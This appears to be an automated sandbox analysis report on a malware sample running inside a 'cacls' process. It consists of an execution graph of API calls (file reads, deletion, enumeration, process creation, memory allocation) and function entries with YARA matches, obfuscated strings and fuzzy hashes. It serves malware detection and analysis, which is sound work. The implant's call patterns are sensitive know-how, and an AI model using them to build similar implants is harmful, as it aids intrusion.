                                                  • Instruction Fuzzy Hash: E9411075A216587BEF01EB94CC42FEF777CAF55B00F404049FA056A180E7B46A85CBE6

                                                  Execution Graph

                                                  Execution Coverage:2.5%
                                                  Dynamic/Decrypted Code Coverage:4.1%
                                                  Signature Coverage:2.2%
                                                  Total number of Nodes:462
                                                  Total number of Limit Nodes:76
                                                  execution_graph 101614 2c710c6 101615 2c710a6 101614->101615 101615->101614 101617 2c710e4 101615->101617 101627 2c79110 101615->101627 101618 2c71175 101617->101618 101619 2c71160 101617->101619 101631 2c792b0 101618->101631 101620 2c792b0 NtClose 101619->101620 101622 2c71169 101620->101622 101623 2c711b5 101624 2c7117e 101624->101623 101634 2c7b350 101624->101634 101628 2c7913e 101627->101628 101629 2c791ba 101627->101629 101628->101617 101630 2c791d0 NtReadFile 101629->101630 101630->101617 101632 2c792ca 101631->101632 101633 2c792db NtClose 101632->101633 101633->101624 101637 2c79640 101634->101637 101636 2c711a9 101638 2c7965a 101637->101638 101639 2c7966b RtlFreeHeap 101638->101639 101639->101636 101640 2c59d40 101641 2c59d4f 101640->101641 101642 2c59d8d 101641->101642 101643 2c59d7a CreateThread 101641->101643 101644 2c6f640 101645 2c6f6a4 101644->101645 101673 2c66110 101645->101673 101647 2c6f7de 101648 2c6f7d7 101648->101647 101680 2c66220 101648->101680 101650 2c6f983 101651 2c6f85a 101651->101650 101652 2c6f992 101651->101652 101684 2c6f420 101651->101684 101653 2c792b0 NtClose 101652->101653 101655 2c6f99c 101653->101655 101656 2c6f896 101656->101652 101657 2c6f8a1 101656->101657 101693 2c7b430 101657->101693 101659 2c6f8ca 101660 2c6f8d3 101659->101660 101661 2c6f8e9 101659->101661 101662 2c792b0 NtClose 101660->101662 101696 2c6f310 CoInitialize 101661->101696 101665 2c6f8dd 101662->101665 101664 2c6f8f7 101699 2c78d50 101664->101699 101667 2c6f972 101668 2c792b0 NtClose 101667->101668 101669 2c6f97c 101668->101669 101670 2c7b350 RtlFreeHeap 101669->101670 101670->101650 101671 2c6f915 101671->101667 101672 2c78d50 LdrInitializeThunk 101671->101672 101672->101671 101675 2c66143 101673->101675 101674 2c66167 101674->101648 101675->101674 101703 2c78e00 101675->101703 101677 2c6618a 101677->101674 101678 2c792b0 NtClose 101677->101678 101679 2c6620c 101678->101679 101679->101648 101681 2c66245 101680->101681 101708 2c78be0 101681->101708 101685 2c6f43c 101684->101685 101713 2c643c0 101685->101713 101687 2c6f460 101687->101656 101688 2c6f457 101688->101687 101689 2c643c0 LdrLoadDll 101688->101689 101690 2c6f52b 101689->101690 101691 2c643c0 LdrLoadDll 101690->101691 101692 2c6f588 101690->101692 101691->101692 101692->101656 101717 2c795f0 101693->101717 101695 2c7b44b 101695->101659 101698 2c6f375 101696->101698 101697 2c6f40b CoUninitialize 101697->101664 101698->101697 101700 2c78d6d 101699->101700 101720 3442ba0 LdrInitializeThunk 101700->101720 101701 2c78d9d 101701->101671 101704 2c78e1a 101703->101704 101707 3442ca0 LdrInitializeThunk 101704->101707 101705 2c78e46 101705->101677 101707->101705 101709 2c78bfd 101708->101709 101712 3442c60 LdrInitializeThunk 101709->101712 101710 2c662b9 101710->101651 101712->101710 101714 2c643e4 101713->101714 101715 2c643eb 101714->101715 101716 2c64420 LdrLoadDll 101714->101716 101715->101688 101716->101715 101718 2c7960a 101717->101718 101719 2c7961b RtlAllocateHeap 101718->101719 101719->101695 101720->101701 101721 2c6ff40 101722 2c6ff5d 101721->101722 101723 2c643c0 LdrLoadDll 101722->101723 101724 2c6ff78 101723->101724 101725 2c66f40 101726 2c66f5c 101725->101726 101733 2c66fac 101725->101733 101728 2c792b0 NtClose 101726->101728 101726->101733 101727 2c670db 101729 2c66f77 101728->101729 101735 2c663a0 NtClose LdrInitializeThunk LdrInitializeThunk 101729->101735 101731 2c670b8 101731->101727 101737 2c66560 NtClose LdrInitializeThunk LdrInitializeThunk 101731->101737 101733->101727 101736 2c663a0 NtClose LdrInitializeThunk LdrInitializeThunk 101733->101736 101735->101733 101736->101731 101737->101727 101738 2c78880 101739 2c7889d 101738->101739 101742 3442df0 LdrInitializeThunk 101739->101742 101740 2c788c5 101742->101740 101743 2c75e40 101744 2c75e9a 101743->101744 101746 2c75ea7 101744->101746 101747 2c73870 101744->101747 101750 2c738b1 101747->101750 101754 2c7b2c0 101747->101754 101749 2c739b0 101749->101746 101750->101749 101751 2c643c0 LdrLoadDll 101750->101751 101753 2c738f1 101751->101753 101752 2c73932 Sleep 101752->101753 101753->101749 101753->101752 101757 2c79420 101754->101757 101756 2c7b2f1 101756->101750 101758 2c7944e 101757->101758 101759 2c794b8 101757->101759 101758->101756 101760 2c794ce NtAllocateVirtualMemory 101759->101760 101760->101756 101761 2c78700 101762 2c78792 101761->101762 101763 2c7872e 101761->101763 101766 3442ee0 LdrInitializeThunk 101762->101766 101764 2c787c3 101766->101764 101767 2c62f8c 101772 2c67b70 101767->101772 101770 2c62fb8 101771 2c792b0 NtClose 101771->101770 101773 2c62f9c 101772->101773 101774 2c67b8a 101772->101774 101773->101770 101773->101771 101778 2c78970 101774->101778 101777 2c792b0 NtClose 101777->101773 101779 2c7898d 101778->101779 101782 34435c0 LdrInitializeThunk 101779->101782 101780 2c67c5a 101780->101777 101782->101780 101783 2c62615 101784 2c62632 101783->101784 101785 2c66110 2 API calls 101784->101785 101786 2c6263d 101785->101786 101787 3442ad0 LdrInitializeThunk 101788 2c5b450 101789 2c5cac1 101788->101789 101790 2c7b2c0 NtAllocateVirtualMemory 101788->101790 101790->101789 101791 2c60c90 101792 2c60c9d 101791->101792 101793 2c643c0 LdrLoadDll 101792->101793 101794 2c60cc4 101793->101794 101795 2c60cfd PostThreadMessageW 101794->101795 101796 2c60d10 101794->101796 101795->101796 101797 2c65a10 101802 2c67ef0 101797->101802 101799 2c65a40 101801 2c65a6c 101799->101801 101806 2c67e70 101799->101806 101803 2c67f03 101802->101803 101813 2c787d0 101803->101813 101805 2c67f2e 101805->101799 101807 2c67eb4 101806->101807 101808 2c67ed5 101807->101808 101819 2c785a0 101807->101819 101808->101799 101810 2c67ec5 101811 2c67ee1 101810->101811 101812 2c792b0 NtClose 101810->101812 101811->101799 101812->101808 101814 2c78851 101813->101814 101816 2c787fe 101813->101816 101818 3442dd0 LdrInitializeThunk 101814->101818 101815 2c78876 101815->101805 101816->101805 101818->101815 101820 2c785ce 101819->101820 101821 2c78620 101819->101821 101820->101810 101824 3444650 LdrInitializeThunk 101821->101824 101822 2c78645 101822->101810 101824->101822 101825 2c6c3d0 101827 2c6c3f9 101825->101827 101826 2c6c4fc 101827->101826 101828 2c6c4a0 FindFirstFileW 101827->101828 101828->101826 101830 2c6c4bb 101828->101830 101829 2c6c4e3 FindNextFileW 101829->101830 101831 2c6c4f5 FindClose 101829->101831 101830->101829 101831->101826 101832 2c62150 101837 2c788d0 101832->101837 101836 2c6219b 101838 2c788ed 101837->101838 101846 3442c0a 101838->101846 101839 2c62186 101841 2c79350 101839->101841 101842 2c793df 101841->101842 101844 2c7937b 101841->101844 101849 3442e80 LdrInitializeThunk 101842->101849 101843 2c79410 101843->101836 101844->101836 101847 3442c11 101846->101847 101848 3442c1f LdrInitializeThunk 101846->101848 101847->101839 101848->101839 101849->101843 101850 2c67110 101851 2c67128 101850->101851 101853 2c6717f 101850->101853 101851->101853 101854 2c6b060 101851->101854 101855 2c6b086 101854->101855 101856 2c6b2a1 101855->101856 101881 2c796d0 101855->101881 101856->101853 101858 2c6b0f9 101858->101856 101884 2c7c520 101858->101884 101860 2c6b118 101860->101856 101861 2c6b1e3 101860->101861 101862 2c788d0 LdrInitializeThunk 101860->101862 101864 2c65990 LdrInitializeThunk 101861->101864 101865 2c6b1fc 101861->101865 101863 2c6b17a 101862->101863 101863->101861 101868 2c6b183 101863->101868 101864->101865 101880 2c6b289 101865->101880 101894 2c78440 101865->101894 101866 2c6b1cb 101869 2c67ef0 LdrInitializeThunk 101866->101869 101867 2c6b1ac 101909 2c74550 LdrInitializeThunk 101867->101909 101868->101856 101868->101866 101868->101867 101890 2c65990 101868->101890 101874 2c6b1d9 101869->101874 101872 2c67ef0 LdrInitializeThunk 101876 2c6b297 101872->101876 101874->101853 101875 2c6b260 101899 2c784f0 101875->101899 101876->101853 101878 2c6b27a 101904 2c78650 101878->101904 101880->101872 101882 2c796ea 101881->101882 101883 2c796fb CreateProcessInternalW 101882->101883 101883->101858 101885 2c7c490 101884->101885 101886 2c7c4ed 101885->101886 101887 2c7b430 RtlAllocateHeap 101885->101887 101886->101860 101888 2c7c4ca 101887->101888 101889 2c7b350 RtlFreeHeap 101888->101889 101889->101886 101891 2c65996 101890->101891 101910 2c78aa0 101891->101910 101893 2c659ce 101893->101867 101895 2c784bd 101894->101895 101896 2c7846b 101894->101896 101916 34439b0 LdrInitializeThunk 101895->101916 101896->101875 101897 2c784e2 101897->101875 101900 2c7856d 101899->101900 101902 2c7851b 101899->101902 101917 3444340 LdrInitializeThunk 101900->101917 101901 2c78592 101901->101878 101902->101878 101905 2c786d0 101904->101905 101906 2c7867e 101904->101906 101918 3442fb0 LdrInitializeThunk 101905->101918 101906->101880 101907 2c786f5 101907->101880 101909->101866 101911 2c78ad2 101910->101911 101912 2c78b54 101910->101912 101911->101893 101915 3442d10 LdrInitializeThunk 101912->101915 101913 2c78b99 101913->101893 101915->101913 101916->101897 101917->101901 101918->101907 101924 2c7c450 101925 2c7b350 RtlFreeHeap 101924->101925 101926 2c7c465 101925->101926 101927 2c79210 101928 2c7923b 101927->101928 101929 2c79287 101927->101929 101930 2c7929d NtDeleteFile 101929->101930 101933 2c59da0 101934 2c5a0a7 101933->101934 101936 2c5a3a2 101934->101936 101937 2c7afc0 101934->101937 101938 2c7afe6 101937->101938 101943 2c54010 101938->101943 101940 2c7aff2 101942 2c7b02b 101940->101942 101946 2c753d0 101940->101946 101942->101936 101945 2c5401d 101943->101945 101950 2c63080 101943->101950 101945->101940 101947 2c75432 101946->101947 101949 2c7543f 101947->101949 101961 2c618b0 101947->101961 101949->101942 101951 2c6309d 101950->101951 101953 2c630b6 101951->101953 101954 2c79d30 101951->101954 101953->101945 101956 2c79d4a 101954->101956 101955 2c79d79 101955->101953 101956->101955 101957 2c788d0 LdrInitializeThunk 101956->101957 101958 2c79dd3 101957->101958 101959 2c7b350 RtlFreeHeap 101958->101959 101960 2c79dec 101959->101960 101960->101953 101962 2c618e8 101961->101962 101977 2c67c80 101962->101977 101964 2c618f0 101965 2c7b430 RtlAllocateHeap 101964->101965 101975 2c61bc3 101964->101975 101966 2c61906 101965->101966 101967 2c7b430 RtlAllocateHeap 101966->101967 101968 2c61914 101967->101968 101969 2c7b430 RtlAllocateHeap 101968->101969 101970 2c61925 101969->101970 101976 2c619bc 101970->101976 101992 2c66850 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 101970->101992 101972 2c643c0 LdrLoadDll 101973 2c61b6f 101972->101973 101988 2c77d10 101973->101988 101975->101949 101976->101972 101978 2c67cac 101977->101978 101979 2c67b70 2 API calls 101978->101979 101980 2c67ccf 101979->101980 101981 2c67cf1 101980->101981 101982 2c67cd9 101980->101982 101983 2c67d0d 101981->101983 101986 2c792b0 NtClose 101981->101986 101984 2c67ce4 101982->101984 101985 2c792b0 NtClose 101982->101985 101983->101964 101984->101964 101985->101984 101987 2c67d03 101986->101987 101987->101964 101989 2c77d72 101988->101989 101991 2c77d7f 101989->101991 101993 2c61be0 101989->101993 101991->101975 101992->101976 101995 2c61c00 101993->101995 102012 2c67f50 101993->102012 102002 2c62140 101995->102002 102016 2c70f60 101995->102016 101998 2c61e16 102000 2c7c520 2 API calls 101998->102000 101999 2c61c5b 101999->102002 102019 2c7c3f0 101999->102019 102004 2c61e2b 102000->102004 102001 2c67ef0 LdrInitializeThunk 102008 2c61e78 102001->102008 102002->101991 102005 2c61fb9 102004->102005 102004->102008 102024 2c75460 102004->102024 102028 2c60740 102005->102028 102007 2c75460 2 API calls 102007->102008 102008->102001 102008->102002 102008->102007 102009 2c60740 LdrInitializeThunk 102008->102009 102009->102008 102010 2c61fc3 102010->102008 102011 2c67ef0 LdrInitializeThunk 102010->102011 102011->102010 102013 2c67f5d 102012->102013 102014 2c67f83 102013->102014 102015 2c67f7c SetErrorMode 102013->102015 102014->101995 102015->102014 102017 2c7b2c0 NtAllocateVirtualMemory 102016->102017 102018 2c70f81 102017->102018 102018->101999 102020 2c7c406 102019->102020 102021 2c7c400 102019->102021 102022 2c7b430 RtlAllocateHeap 102020->102022 102021->101998 102023 2c7c42c 102022->102023 102023->101998 102025 2c754c2 102024->102025 102027 2c754e3 102025->102027 102031 2c65aa0 102025->102031 102027->102004 102035 2c79550 102028->102035 102032 2c65a46 102031->102032 102033 2c65a6c 102032->102033 102034 2c67e70 2 API calls 102032->102034 102033->102027 102034->102032 102036 2c7956a 102035->102036 102039 3442c70 LdrInitializeThunk 102036->102039 102037 2c60762 102037->102010 102039->102037 102040 2c715a0 102041 2c715bc 102040->102041 102042 2c715e4 102041->102042 102043 2c715f8 102041->102043 102045 2c792b0 NtClose 102042->102045 102044 2c792b0 NtClose 102043->102044 102047 2c71601 102044->102047 102046 2c715ed 102045->102046 102050 2c7b470 RtlAllocateHeap 102047->102050 102049 2c7160c 102050->102049 102056 2c78fa0 102057 2c7905a 102056->102057 102059 2c78fd2 102056->102059 102058 2c79070 NtCreateFile 102057->102058 102060 2c699ef 102061 2c69a06 102060->102061 102062 2c69a0b 102060->102062 102063 2c69a3d 102062->102063 102064 2c7b350 RtlFreeHeap 102062->102064 102064->102063 102065 2c685f7 102066 2c685fa 102065->102066 102068 2c68519 102066->102068 102069 2c66ec0 102066->102069 102070 2c66ed6 102069->102070 102072 2c66f0c 102069->102072 102070->102072 102073 2c66d30 LdrLoadDll 102070->102073 102072->102068 102073->102072 102075 2c66bb0 102076 2c66bd7 102075->102076 102079 2c67d20 102076->102079 102078 2c66c01 102080 2c67d3d 102079->102080 102086 2c789c0 102080->102086 102082 2c67d94 102082->102078 102083 2c67d8d 102083->102082 102084 2c78aa0 LdrInitializeThunk 102083->102084 102085 2c67dbd 102084->102085 102085->102078 102087 2c78a5e 102086->102087 102089 2c789ee 102086->102089 102091 3442f30 LdrInitializeThunk 102087->102091 102088 2c78a97 102088->102083 102089->102083 102091->102088 102092 2c6ab30 102097 2c6a840 102092->102097 102094 2c6ab3d 102111 2c6a4b0 102094->102111 102096 2c6ab59 102098 2c6a865 102097->102098 102122 2c68150 102098->102122 102101 2c6a9b0 102101->102094 102103 2c6a9c7 102103->102094 102104 2c6a9be 102104->102103 102106 2c6aab5 102104->102106 102141 2c69f00 102104->102141 102108 2c6ab1a 102106->102108 102150 2c6a270 102106->102150 102109 2c7b350 RtlFreeHeap 102108->102109 102110 2c6ab21 102109->102110 102110->102094 102112 2c6a4c6 102111->102112 102119 2c6a4d1 102111->102119 102113 2c7b430 RtlAllocateHeap 102112->102113 102113->102119 102114 2c6a4f5 102114->102096 102115 2c68150 GetFileAttributesW 102115->102119 102116 2c6a812 102117 2c6a82b 102116->102117 102118 2c7b350 RtlFreeHeap 102116->102118 102117->102096 102118->102117 102119->102114 102119->102115 102119->102116 102120 2c69f00 RtlFreeHeap 102119->102120 102121 2c6a270 RtlFreeHeap 102119->102121 102120->102119 102121->102119 102123 2c6816f 102122->102123 102124 2c68176 GetFileAttributesW 102123->102124 102125 2c68181 102123->102125 102124->102125 102125->102101 102126 2c73160 102125->102126 102127 2c7316e 102126->102127 102128 2c73175 102126->102128 102127->102104 102129 2c643c0 LdrLoadDll 102128->102129 102130 2c731a7 102129->102130 102131 2c731b6 102130->102131 102154 2c72c20 LdrLoadDll 102130->102154 102133 2c7b430 RtlAllocateHeap 102131->102133 102137 2c73364 102131->102137 102134 2c731cf 102133->102134 102135 2c7335a 102134->102135 102134->102137 102139 2c731eb 102134->102139 102136 2c7b350 RtlFreeHeap 102135->102136 102135->102137 102136->102137 102137->102104 102138 2c7b350 RtlFreeHeap 102140 2c7334e 102138->102140 102139->102137 102139->102138 102140->102104 102142 2c69f26 102141->102142 102155 2c6d940 102142->102155 102144 2c69f98 102146 2c6a120 102144->102146 102147 2c69fb6 102144->102147 102145 2c6a105 102145->102104 102146->102145 102148 2c69dc0 RtlFreeHeap 102146->102148 102147->102145 102160 2c69dc0 102147->102160 102148->102146 102151 2c6a296 102150->102151 102152 2c6d940 RtlFreeHeap 102151->102152 102153 2c6a31d 102152->102153 102153->102106 102154->102131 102157 2c6d964 102155->102157 102156 2c6d971 102156->102144 102157->102156 102158 2c7b350 RtlFreeHeap 102157->102158 102159 2c6d9b4 102158->102159 102159->102144 102161 2c69ddd 102160->102161 102164 2c6d9d0 102161->102164 102163 2c69ee3 102163->102147 102165 2c6d9f4 102164->102165 102166 2c7b350 RtlFreeHeap 102165->102166 102167 2c6da9e 102165->102167 102166->102167 102167->102163 102173 2c71930 102174 2c71949 102173->102174 102175 2c71994 102174->102175 102178 2c719d4 102174->102178 102180 2c719d9 102174->102180 102176 2c7b350 RtlFreeHeap 102175->102176 102177 2c719a4 102176->102177 102179 2c7b350 RtlFreeHeap 102178->102179 102179->102180 102181 2c718b9 102182 2c718bf 102181->102182 102183 2c792b0 NtClose 102182->102183 102185 2c718c4 102182->102185 102184 2c718e9 102183->102184

                                                  Executed Functions

                                                  Function 02C59DA0 Relevance: 27.8, Strings: 22, Instructions: 349COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 29 2c59da0-2c5a0a0 30 2c5a0a7-2c5a0ae 29->30 31 2c5a0d5-2c5a0df 30->31 32 2c5a0b0-2c5a0d3 30->32 33 2c5a0f0-2c5a0f9 31->33 32->30 34 2c5a117-2c5a128 33->34 35 2c5a0fb-2c5a107 33->35 38 2c5a139-2c5a145 34->38 36 2c5a115 35->36 37 2c5a109-2c5a10f 35->37 36->33 37->36 40 2c5a167-2c5a16e 38->40 41 2c5a147-2c5a157 38->41 44 2c5a175-2c5a185 40->44 42 2c5a165 41->42 43 2c5a159-2c5a162 41->43 42->38 43->42 44->44 46 2c5a187-2c5a191 44->46 47 2c5a1a2-2c5a1ae 46->47 48 2c5a1b0-2c5a1bd 47->48 49 2c5a1bf-2c5a1c6 47->49 48->47 51 2c5a1ed-2c5a1f6 49->51 52 2c5a1c8-2c5a1eb 49->52 53 2c5a2ed-2c5a2f7 51->53 54 2c5a1fc-2c5a203 51->54 52->49 55 2c5a308-2c5a311 53->55 56 2c5a235-2c5a23e 54->56 57 2c5a205-2c5a233 54->57 58 2c5a324-2c5a32b 55->58 59 2c5a313-2c5a322 55->59 60 2c5a240-2c5a261 56->60 61 2c5a263-2c5a276 56->61 57->54 63 2c5a352-2c5a359 58->63 64 2c5a32d-2c5a350 58->64 59->55 60->56 65 2c5a287-2c5a293 61->65 66 2c5a4e0-2c5a4e9 63->66 67 2c5a35f-2c5a369 63->67 64->58 68 2c5a295-2c5a2a4 65->68 69 2c5a2a6-2c5a2b5 65->69 70 2c5a39d call 2c7afc0 67->70 71 2c5a36b-2c5a38a 67->71 68->65 72 2c5a2b7-2c5a2bb 69->72 73 2c5a2de-2c5a2e8 69->73 80 2c5a3a2-2c5a3ac 70->80 77 2c5a38c-2c5a395 71->77 78 2c5a39b 71->78 75 2c5a2bd-2c5a2da 72->75 76 2c5a2dc 72->76 73->51 75->72 76->53 77->78 78->67 81 2c5a3bd-2c5a3c6 80->81 82 2c5a3dc-2c5a3e6 81->82 83 2c5a3c8-2c5a3da 81->83 84 2c5a3f7-2c5a403 82->84 83->81 86 2c5a405-2c5a418 84->86 87 2c5a41a-2c5a424 84->87 86->84 88 2c5a435-2c5a441 87->88 90 2c5a463-2c5a46d 88->90 91 2c5a443-2c5a450 88->91 94 2c5a47e-2c5a48a 90->94 92 2c5a461 91->92 93 2c5a452-2c5a45b 91->93 92->88 93->92 95 2c5a48c-2c5a498 94->95 96 2c5a4a8-2c5a4b2 94->96 98 2c5a4a6 95->98 99 2c5a49a-2c5a4a0 95->99 100 2c5a4c3-2c5a4cf 96->100 98->94 99->98 100->66 102 2c5a4d1-2c5a4de 100->102 102->100
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: [$)$0$4g$5$?$?$ [$H$I$M$R$Y$]\$g%$k#$k;$ld$t$v$y$z$`
                                                  • API String ID: 0-2433169293
                                                  • Opcode ID: 6986a603d219a3d893eeea0ab99164425104c77785633704d33371e0c6acd53b
                                                  • Instruction ID: 0a620bfd3ba4183bc2ab7d817b34c27fc75e8f6d5818db0f07feb37bbf375176
                                                  • Opcode Fuzzy Hash: 6986a603d219a3d893eeea0ab99164425104c77785633704d33371e0c6acd53b
                                                  • Instruction Fuzzy Hash: 53128FB0D05229CBEB24CF46CD98BDDBBB2BB85308F1082D9C5096B281D7799AC5CF55
                                                  Function 02C6C3D0 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 02C6C4B1
                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 02C6C4EE
                                                  • FindClose.KERNELBASE(?), ref: 02C6C4F9
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNext
                                                  • String ID:
                                                  • API String ID: 3541575487-0
                                                  • Opcode ID: bc66d86312ebc6ef6e3907c8a74d7963f6ac8d6a1ce33587f1f686d4c57f2586
                                                  • Instruction ID: bd8035872b2227943e0ace480228069637ccf101bc6b92c871cbd217ca05f7f6
                                                  • Opcode Fuzzy Hash: bc66d86312ebc6ef6e3907c8a74d7963f6ac8d6a1ce33587f1f686d4c57f2586
                                                  • Instruction Fuzzy Hash: F83185B15003487BDB21DFA4CC89FFF777D9F84744F144599B949A6180DAB0AB858BA0
                                                  Function 02C78FA0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtCreateFile.NTDLL(?,?,DBBD0E3C,?,?,?,?,?,?,?,?), ref: 02C790A1
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: cf4f05f55e90c3a7f7feff87def1e5eee0934afa099a0fd70dc5aed26f9f5470
                                                  • Instruction ID: af13f3ec75ad6960746a3bf41f87a1270aaae5465dd350f6a04ef0e1603cd999
                                                  • Opcode Fuzzy Hash: cf4f05f55e90c3a7f7feff87def1e5eee0934afa099a0fd70dc5aed26f9f5470
                                                  • Instruction Fuzzy Hash: 3B31A4B5A01608AFDB14DF99D881EEEB7B9EF8C304F108119F919A7340D770A951CFA5
                                                  Function 02C79110 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtReadFile.NTDLL(?,?,DBBD0E3C,?,?,?,?,?,?), ref: 02C791F9
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 2afcf5c65d3e6ccc78585837a02f9a84affda7150da3f51b621626d4a1f0463a
                                                  • Instruction ID: b1a7166439971074a4ab671d791293c8d4c123b577ad7483531c7f267bceaff2
                                                  • Opcode Fuzzy Hash: 2afcf5c65d3e6ccc78585837a02f9a84affda7150da3f51b621626d4a1f0463a
                                                  • Instruction Fuzzy Hash: 4E31C7B5A01609AFDB14DF98D881EEFB7B9EF88304F108119FD19A7340D770A9518FA5
                                                  Function 02C79420 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(02C61C5B,?,DBBD0E3C,00000000,00000004,00003000,?,?,?,?,?,02C77D7F,02C61C5B,EC8B5512,02C61C5B,00000000), ref: 02C794EB
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: 6c585844073dfe556d3840ee322596f1c51ccaeaf2cc9224f5f34424a96d5197
                                                  • Instruction ID: dcc1e8c42bc42f3ddc2f9b48883ca79ed6118ba8451d8bad84fd4dbf0c10bf51
                                                  • Opcode Fuzzy Hash: 6c585844073dfe556d3840ee322596f1c51ccaeaf2cc9224f5f34424a96d5197
                                                  • Instruction Fuzzy Hash: 1A210CB5901609AFDB14DF58D841EEFB7B9EF89300F008109FD1897340D770A9528FA5
                                                  Function 02C79210 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  • Opcode ID: ed1d6bad987a9a79994bfa73549fd3292b2337e596944e13130c9f1ee58fef44
                                                  • Instruction ID: 5b53af3c3ccda9b857f59062f9b0027744da12980b19386eb1b27b5ea06f5a78
                                                  • Opcode Fuzzy Hash: ed1d6bad987a9a79994bfa73549fd3292b2337e596944e13130c9f1ee58fef44
                                                  • Instruction Fuzzy Hash: 251170715016446FE720EB69DC41FEFB76DDF85714F008109F9586B281E7706A428BA5
                                                  Function 02C792B0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02C792E4
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 29ccce100494c67d4f1b09088285493934354a39b66b0afe61a6abcbbcb7c63c
                                                  • Instruction ID: 0bee8e669a131fd8672b67d43d4313e0d9cf2c7dc0569a576762507fb20b1a89
                                                  • Opcode Fuzzy Hash: 29ccce100494c67d4f1b09088285493934354a39b66b0afe61a6abcbbcb7c63c
                                                  • Instruction Fuzzy Hash: BDE086352402147BD610FA59DC45F9B775DDFC5750F008419FA0867140D770B9118BF4
                                                  Function 03444340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a6abfc0c18735ac52068e17d15045da3094bb8b7571182ae2efe9e0df3e6e6cb
                                                  • Instruction ID: 068bfc2fcbe1a51d7cbcebe999f4cf7ddcea3a61d90f5d7aafe0ce93313e869e
                                                  • Opcode Fuzzy Hash: a6abfc0c18735ac52068e17d15045da3094bb8b7571182ae2efe9e0df3e6e6cb
                                                  • Instruction Fuzzy Hash: 18900231B05804129140B15848845464005D7F0301B55C012F4424954D8F148E565765
                                                  Function 03444650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
